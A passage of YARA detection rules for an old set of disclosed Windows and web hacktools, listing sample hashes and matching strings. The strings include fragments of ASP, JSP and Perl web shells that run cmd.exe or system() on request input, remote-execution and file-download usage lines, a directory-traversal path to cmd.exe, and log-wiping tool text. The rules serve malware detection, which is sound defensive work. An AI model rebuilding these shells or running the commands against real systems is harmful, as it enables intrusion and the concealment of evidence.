"set sys=server.CreateObject (\"system.contral\") " fullword ascii $s3 = "Public Function reboot(atype As Variant)" fullword ascii $s4 = "t& = ExitWindowsEx(1, atype)" ascii $s5 = "atype=request(\"atype\") " fullword ascii $s7 = "AceiveX dll" fullword ascii $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii $s10 = "sys.reboot(atype)" fullword ascii condition: all of them } rule aspfile1 { meta: description = "Disclosed hacktool set (old stuff) - file aspfile1.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af" strings: $s0 = "' -- check for a command that we have posted -- '" fullword ascii $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii $s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii $s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii $s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii $s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii condition: 3 of them } rule EditServer_HackTool { meta: description = "Disclosed hacktool set (old stuff) - file EditServer.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3" strings: $s0 = "%s Server.exe" fullword ascii $s1 = "Service Port: %s" fullword ascii $s2 = "The Port Must Been >0 & <65535" fullword ascii $s8 = "3--Set Server Port" fullword ascii $s9 = "The Server Password Exceeds 32 Characters" fullword ascii $s13 = "Service Name: %s" fullword ascii $s14 = "Server Password: %s" fullword ascii $s17 = "Inject Process Name: %s" fullword ascii $x1 = "WinEggDrop Shell Congirator" fullword ascii condition: 5 of ($s*) or $x1 } rule sig_238_letmein { meta: description = "Disclosed hacktool set (old stuff) - file letmein.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = 
"74d223a56f97b223a640e4139bb9b94d8faa895d" strings: $s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii $s6 = "Error get users from server!" fullword ascii $s7 = "get in nt by name and null" fullword ascii $s16 = "get something from nt, hold by killusa." fullword ascii condition: all of them } rule sig_238_token { meta: description = "Disclosed hacktool set (old stuff) - file token.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14" strings: $s0 = "Logon.exe" fullword ascii $s1 = "Domain And User:" fullword ascii $s2 = "PID=Get Addr$(): One" fullword ascii $s3 = "Process " fullword ascii $s4 = "psapi.dllK" fullword ascii condition: all of them } rule sig_238_TELNET { meta: description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME" author = "Florian Roth" date = "23.11.14" score = 60 hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1" strings: $s0 = "TELNET [host [port]]" fullword wide $s2 = "TELNET.EXE" fullword wide $s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide $s14 = "Software\\Microsoft\\Telnet" fullword wide condition: all of them } rule snifferport { meta: description = "Disclosed hacktool set (old stuff) - file snifferport.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d14133b5eaced9b7039048d0767c544419473144" strings: $s0 = "iphlpapi.DLL" fullword ascii $s5 = "ystem\\CurrentCorolSet\\" fullword ascii $s11 = "Port.TX" fullword ascii $s12 = "32Next" fullword ascii $s13 = "V1.2 B" fullword ascii condition: all of them } rule sig_238_webget { meta: description = "Disclosed hacktool set (old stuff) - file webget.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "36b5a5dee093aa846f906bbecf872a4e66989e42" strings: $s0 = "Packed by exe32pack" ascii $s1 = "GET A HTTP/1.0" fullword ascii $s2 = " error " fullword ascii $s13 = "Downloa" ascii condition: all of them } rule XYZCmd_zip_Folder_XYZCmd { meta: 
description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115" strings: $s0 = "Executes Command Remotely" fullword wide $s2 = "XYZCmd.exe" fullword wide $s6 = "No Client Software" fullword wide $s19 = "XYZCmd V1.0 For NT S" fullword ascii condition: all of them } rule ASPack_Chinese { meta: description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini" author = "Florian Roth" date = "23.11.14" score = 60 hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e" strings: $s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii $s1 = "; For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii $s2 = "E-Mail: shinlan@km169.net" fullword ascii $s8 = "; Please, translate text only after simbol '='" fullword ascii $s19 = "= Compress with ASPack" fullword ascii condition: all of them } rule aspbackdoor_EDIR { meta: description = "Disclosed hacktool set (old stuff) - file EDIR.ASP" author = "Florian Roth" date = "23.11.14" score = 60 hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb" strings: $s1 = "response.write \"<a href='index.asp'>" fullword ascii $s3 = "if Request.Cookies(\"password\")=\"" ascii $s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii $s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii $s19 = "whichdir=Request(\"path\")" fullword ascii condition: all of them } rule sig_238_filespy { meta: description = "Disclosed hacktool set (old stuff) - file filespy.exe" author = "Florian Roth" date = "23.11.14" score = 50 hash = "89d8490039778f8c5f07aa7fd476170293d24d26" strings: $s0 = "Hit [Enter] to begin command mode..." fullword ascii $s1 = "If you are in command mode," fullword ascii $s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii $s9 = "FileSpy.exe" fullword wide $s12 = "ERROR starting FileSpy..." 
fullword ascii $s16 = "exe\\filespy.dbg" fullword ascii $s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii $s19 = "Should be logging to screen..." fullword ascii $s20 = "Filmon: Unknown log record type" fullword ascii condition: 7 of them } rule ByPassFireWall_zip_Folder_Ie { meta: description = "Disclosed hacktool set (old stuff) - file Ie.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d1b9058f16399e182c9b78314ad18b975d882131" strings: $s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii $s1 = "LOADER ERROR" fullword ascii $s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii $s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii condition: all of them } rule EditKeyLogReadMe { meta: description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a" strings: $s0 = "editKeyLog.exe KeyLog.exe," fullword ascii $s1 = "WinEggDrop.DLL" fullword ascii $s2 = "nc.exe" fullword ascii $s3 = "KeyLog.exe" fullword ascii $s4 = "EditKeyLog.exe" fullword ascii $s5 = "wineggdrop" fullword ascii condition: 3 of them } rule PassSniffer_zip_Folder_readme { meta: description = "Disclosed hacktool set (old stuff) - file readme.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd" strings: $s0 = "PassSniffer.exe" fullword ascii $s1 = "POP3/FTP Sniffer" fullword ascii $s2 = "Password Sniffer V1.0" fullword ascii condition: 1 of them } rule sig_238_gina { meta: description = "Disclosed hacktool set (old stuff) - file gina.reg" author = "Florian Roth" date = "23.11.14" score = 60 hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6" strings: $s0 = "\"gina\"=\"gina.dll\"" fullword ascii $s1 = "REGEDIT4" fullword ascii $s2 = 
"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii condition: all of them } rule splitjoin { meta: description = "Disclosed hacktool set (old stuff) - file splitjoin.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c" strings: $s0 = "Not for distribution without the authors permission" fullword wide $s2 = "Utility to split and rejoin files.0" fullword wide $s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide $s19 = "SplitJoin" fullword wide condition: all of them } rule EditKeyLog { meta: description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a450c31f13c23426b24624f53873e4fc3777dc6b" strings: $s1 = "Press Any Ke" fullword ascii $s2 = "Enter 1 O" fullword ascii $s3 = "Bon >0 & <65535L" fullword ascii $s4 = "--Choose " fullword ascii condition: all of them } rule PassSniffer { meta: description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f" strings: $s2 = "Sniff" fullword ascii $s3 = "GetLas" fullword ascii $s4 = "VersionExA" fullword ascii $s10 = " Only RuntUZ" fullword ascii $s12 = "emcpysetprintf\\" fullword ascii $s13 = "WSFtartup" fullword ascii condition: all of them } rule aspfile2 { meta: description = "Disclosed hacktool set (old stuff) - file aspfile2.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29" strings: $s0 = "response.write \"command completed success!\" " fullword ascii $s1 = "for each co in foditems " fullword ascii $s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii $s19 = "<title>Hello! 
Welcome </title>" fullword ascii condition: all of them } rule UnPack_rar_Folder_InjectT { meta: description = "Disclosed hacktool set (old stuff) - file InjectT.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6" strings: $s0 = "%s -Install -->To Install The Service" fullword ascii $s1 = "Explorer.exe" fullword ascii $s2 = "%s -Start -->To Start The Service" fullword ascii $s3 = "%s -Stop -->To Stop The Service" fullword ascii $s4 = "The Port Is Out Of Range" fullword ascii $s7 = "Fail To Set The Port" fullword ascii $s11 = "\\psapi.dll" fullword ascii $s20 = "TInject.Dll" fullword ascii $x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii $x2 = "injectt.exe" fullword ascii condition: ( 1 of ($x*) ) and ( 3 of ($s*) ) } rule Jc_WinEggDrop_Shell { meta: description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "820674b59f32f2cf72df50ba4411d7132d863ad2" strings: $s0 = "Sniffer.dll" fullword ascii $s4 = ":Execute net.exe user Administrator pass" fullword ascii $s5 = "Fport.exe or mport.exe " fullword ascii $s6 = ":Password Sniffering Is Running |Not Running " fullword ascii $s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii $s15 = ": Del www.exe " fullword ascii $s20 = ":Dir *.exe " fullword ascii condition: 2 of them } rule aspbackdoor_asp1 { meta: description = "Disclosed hacktool set (old stuff) - file asp1.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50" strings: $s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii $s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii $s6 = "set rs=conn.execute (sql)%> " fullword ascii $s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii $s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii 
$s15 = "sql=\"select * from scjh\" " fullword ascii condition: all of them } rule QQ_zip_Folder_QQ { meta: description = "Disclosed hacktool set (old stuff) - file QQ.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb" strings: $s0 = "EMAIL:haoq@neusoft.com" fullword wide $s1 = "EMAIL:haoq@neusoft.com" fullword wide $s4 = "QQ2000b.exe" fullword wide $s5 = "haoq@neusoft.com" fullword ascii $s9 = "QQ2000b.exe" fullword ascii $s10 = "\\qq2000b.exe" fullword ascii $s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide $s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii condition: 5 of them } rule UnPack_rar_Folder_TBack { meta: description = "Disclosed hacktool set (old stuff) - file TBack.DLL" author = "Florian Roth" date = "23.11.14" score = 60 hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f" strings: $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword ascii $s1 = "http://IP/a.exe a.exe -->Download A File" fullword ascii $s2 = "StopSniffer -->Stop Pass Sniffer" fullword ascii $s3 = "TerminalPort Port -->Set New Terminal Port" fullword ascii $s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii $s6 = "Create Password Sniffering Thread Successfully. 
Status:Logging" fullword ascii $s7 = "StartSniffer NIC -->Start Sniffer" fullword ascii $s8 = "Shell -->Get A Shell" fullword ascii $s11 = "DeleteService ServiceName -->Delete A Service" fullword ascii $s12 = "Disconnect ThreadNumber|All -->Disconnect Others" fullword ascii $s13 = "Online -->List All Connected IP" fullword ascii $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii $s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii $s18 = "Execute Program -->Execute A Program" fullword ascii $s19 = "Reboot -->Reboot The System" fullword ascii $s20 = "Password Sniffering Is Not Running" fullword ascii condition: 4 of them } rule sig_238_cmd_2 { meta: description = "Disclosed hacktool set (old stuff) - file cmd.jsp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "be4073188879dacc6665b6532b03db9f87cfc2bb" strings: $s0 = "Process child = Runtime.getRuntime().exec(" ascii $s1 = "InputStream in = child.getInputStream();" fullword ascii $s2 = "String cmd = request.getParameter(\"" ascii $s3 = "while ((c = in.read()) != -1) {" fullword ascii $s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii condition: all of them } rule RangeScan { meta: description = "Disclosed hacktool set (old stuff) - file RangeScan.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7" strings: $s0 = "RangeScan.EXE" fullword wide $s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii $s9 = "Produced by isn0" fullword ascii $s10 = "RangeScan" fullword wide $s20 = "%d-%d-%d %d:%d:%d" fullword ascii condition: 3 of them } rule XYZCmd_zip_Folder_Readme { meta: description = "Disclosed hacktool set (old stuff) - file Readme.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70" strings: $s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii $s20 = "XYZCmd V1.0" fullword ascii condition: all of them } rule 
ByPassFireWall_zip_Folder_Inject { meta: description = "Disclosed hacktool set (old stuff) - file Inject.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728" strings: $s6 = "Fail To Inject" fullword ascii $s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii $s11 = " Successfully" fullword ascii condition: all of them } rule sig_238_sqlcmd { meta: description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe" author = "Florian Roth" date = "23.11.14" score = 40 hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a" strings: $s0 = "Permission denial to EXEC command.:(" fullword ascii $s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii $s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii $s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii $s6 = "SqlCmd2.exe Inside Edition." fullword ascii $s7 = "Http://www.patching.net 2000/12/14" fullword ascii $s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii condition: 4 of them } rule ASPack_ASPACK { meta: description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE" author = "Florian Roth" date = "23.11.14" score = 60 hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42" strings: $s0 = "ASPACK.EXE" fullword wide $s5 = "CLOSEDFOLDER" fullword wide $s10 = "ASPack compressor" fullword wide condition: all of them } rule sig_238_2323 { meta: description = "Disclosed hacktool set (old stuff) - file 2323.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763" strings: $s0 = "port - Port to listen on, defaults to 2323" fullword ascii $s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii $s3 = "Failed to execute shell" fullword ascii $s5 = "/h - Hide Window" fullword ascii $s7 = "Accepted connection from client at %s" fullword ascii $s9 = "Error %d: %s" fullword ascii condition: all of them } rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 { meta: description = "Disclosed hacktool set (old stuff) - file 
Install.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "95866e917f699ee74d4735300568640ea1a05afd" strings: $s1 = "http://go.163.com/sdemo" fullword wide $s2 = "Player.tmp" fullword ascii $s3 = "Player.EXE" fullword wide $s4 = "mailto:sdemo@263.net" fullword ascii $s5 = "S-Player.exe" fullword ascii $s9 = "http://www.BaiXue.net (" fullword wide condition: all of them } rule sig_238_TFTPD32 { meta: description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8" strings: $s0 = " http://arm.533.net" fullword ascii $s1 = "Tftpd32.hlp" fullword ascii $s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii $s3 = "TFTPD32 -- " fullword wide $s4 = "%d -- %s" fullword ascii $s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii $s12 = "TftpPort" fullword ascii $s13 = "Ttftpd32BackGround" fullword ascii $s17 = "SOFTWARE\\TFTPD32" fullword ascii condition: all of them } rule sig_238_iecv { meta: description = "Disclosed hacktool set (old stuff) - file iecv.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "6e6e75350a33f799039e7a024722cde463328b6d" strings: $s1 = "Edit The Content Of Cookie " fullword wide $s3 = "Accessories\\wordpad.exe" fullword ascii $s4 = "gorillanation.com" fullword ascii $s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii $s12 = "http://nirsoft.cjb.net" fullword ascii condition: all of them } rule Antiy_Ports_1_21 { meta: description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0" strings: $s0 = "AntiyPorts.EXE" fullword wide $s7 = "AntiyPorts MFC Application" fullword wide $s20 = " @Stego:" fullword ascii condition: all of them } rule perlcmd_zip_Folder_cmd { meta: description = "Disclosed hacktool set (old 
stuff) - file cmd.cgi" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8" strings: $s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii $s1 = "s/%20/ /ig;" fullword ascii $s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii $s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii $s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii $s6 = "$execthis = $_;" fullword ascii $s7 = "system($execthis);" fullword ascii $s12 = "s/%2f/\\//ig;" fullword ascii condition: 6 of them } rule aspbackdoor_asp3 { meta: description = "Disclosed hacktool set (old stuff) - file asp3.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c" strings: $s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii $s1 = " Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii $s2 = " value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii $s14 = " Windows NT " fullword ascii $s16 = " WIndows 2000 " fullword ascii $s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii $s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii $s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii condition: all of them } rule sig_238_FPipe { meta: description = "Disclosed hacktool set (old stuff) - file FPipe.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c" strings: $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii $s1 = "Unable to resolve hostname \"%s\"" fullword ascii $s2 = "source port for that outbound connection being set to 53 also." 
fullword ascii $s3 = " -s - outbound source port number" fullword ascii $s5 = "http://www.foundstone.com" fullword ascii $s20 = "Attempting to connect to %s port %d" fullword ascii condition: all of them } rule sig_238_concon { meta: description = "Disclosed hacktool set (old stuff) - file concon.com" author = "Florian Roth" date = "23.11.14" score = 60 hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1" strings: $s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii condition: all of them } rule aspbackdoor_regdll { meta: description = "Disclosed hacktool set (old stuff) - file regdll.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d" strings: $s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii $s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii $s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii $s5 = "Public Property Get oFS()" fullword ascii condition: all of them } rule CleanIISLog { meta: description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094" strings: $s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii $s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii $s8 = "CleanIISLog Ver" fullword ascii $s9 = "msftpsvc" fullword ascii $s10 = "Fatal Error: MFC initialization failed" fullword ascii $s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii $s12 = "Specified \".\" Will Clean All IP Record." fullword ascii $s16 = "Service %s Stopped." fullword ascii $s20 = "Process Log File %s..." 
fullword ascii condition: 5 of them } rule sqlcheck { meta: description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7" strings: $s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii $s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii $s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii $s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii $s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii condition: 3 of them } rule sig_238_RunAsEx { meta: description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35" strings: $s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii $s8 = "cmd.bat" fullword ascii $s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii $s11 = "%s Execute Succussifully." fullword ascii $s12 = "winsta0" fullword ascii $s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii condition: 4 of them } rule sig_238_nbtdump { meta: description = "Disclosed hacktool set (old stuff) - file nbtdump.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8" strings: $s0 = "Creation of results file - \"%s\" failed." 
fullword ascii $s1 = "c:\\>nbtdump remote-machine" fullword ascii $s7 = "Cerberus NBTDUMP" fullword ascii $s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii $s18 = "<P><H3>Account Information</H3><PRE>" fullword wide $s19 = "%s's password is %s</H3>" fullword wide $s20 = "%s's password is blank</H3>" fullword wide condition: 5 of them } rule sig_238_Glass2k { meta: description = "Disclosed hacktool set (old stuff) - file Glass2k.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a" strings: $s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii $s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii $s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii $s4 = "Glass2k.exe" fullword wide $s7 = "NeoLite Executable File Compressor" fullword ascii condition: all of them } rule SplitJoin_V1_3_3_rar_Folder_3 { meta: description = "Disclosed hacktool set (old stuff) - file splitjoin.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21409117b536664a913dcd159d6f4d8758f43435" strings: $s2 = "ie686@sohu.com" fullword ascii $s3 = "splitjoin.exe" fullword ascii $s7 = "SplitJoin" fullword ascii condition: all of them } rule aspbackdoor_EDIT { meta: description = "Disclosed hacktool set (old stuff) - file EDIT.ASP" author = "Florian Roth" date = "23.11.14" score = 60 hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb" strings: $s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii $s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii $s3 = "response.write \"<a href='index.asp'>" fullword ascii $s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii $s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii $s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii $s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii condition: 5 of them } rule aspbackdoor_entice { meta: 
description = "Disclosed hacktool set (old stuff) - file entice.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183" strings: $s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii $s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii $s4 = "conndb.Execute(sqllanguage)" fullword ascii $s5 = "<!--#include file=sqlconn.asp-->" fullword ascii $s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii condition: all of them } rule FPipe2_0 { meta: description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "891609db7a6787575641154e7aab7757e74d837b" strings: $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii $s1 = "Unable to resolve hostname \"%s\"" fullword ascii $s2 = " -s - outbound connection source port number" fullword ascii $s3 = "source port for that outbound connection being set to 53 also." fullword ascii $s4 = "http://www.foundstone.com" fullword ascii $s19 = "FPipe" fullword ascii condition: all of them } rule InstGina { meta: description = "Disclosed hacktool set (old stuff) - file InstGina.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5317fbc39508708534246ef4241e78da41a4f31c" strings: $s0 = "To Open Registry" fullword ascii $s4 = "I love Candy very much!!" 
ascii $s5 = "GinaDLL" fullword ascii condition: all of them } rule ArtTray_zip_Folder_ArtTray { meta: description = "Disclosed hacktool set (old stuff) - file ArtTray.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "ee1edc8c4458c71573b5f555d32043cbc600a120" strings: $s0 = "http://www.brigsoft.com" fullword wide $s2 = "ArtTrayHookDll.dll" fullword ascii $s3 = "ArtTray Version 1.0 " fullword wide $s16 = "TRM_HOOKCALLBACK" fullword ascii condition: all of them } rule sig_238_findoor { meta: description = "Disclosed hacktool set (old stuff) - file findoor.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce" strings: $s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii $s8 = "PASS hacker@hacker.com" fullword ascii $s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii $s10 = "MAIL FROM:hacker@hacker.com" fullword ascii $s11 = "http://isno.yeah.net" fullword ascii condition: 4 of them } rule aspbackdoor_ipclear { meta: description = "Disclosed hacktool set (old stuff) - file ipclear.vbs" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098" strings: $s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii $s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii $s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii $s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii $s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii condition: all of them } rule WinEggDropShellFinal_zip_Folder_InjectT { meta: description = "Disclosed hacktool set (old stuff) - file InjectT.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "516e80e4a25660954de8c12313e2d7642bdb79dd" strings: $s0 = "Packed by exe32pack" ascii $s1 = "2TInject.Dll" fullword ascii $s2 = "Windows Services" fullword ascii $s3 
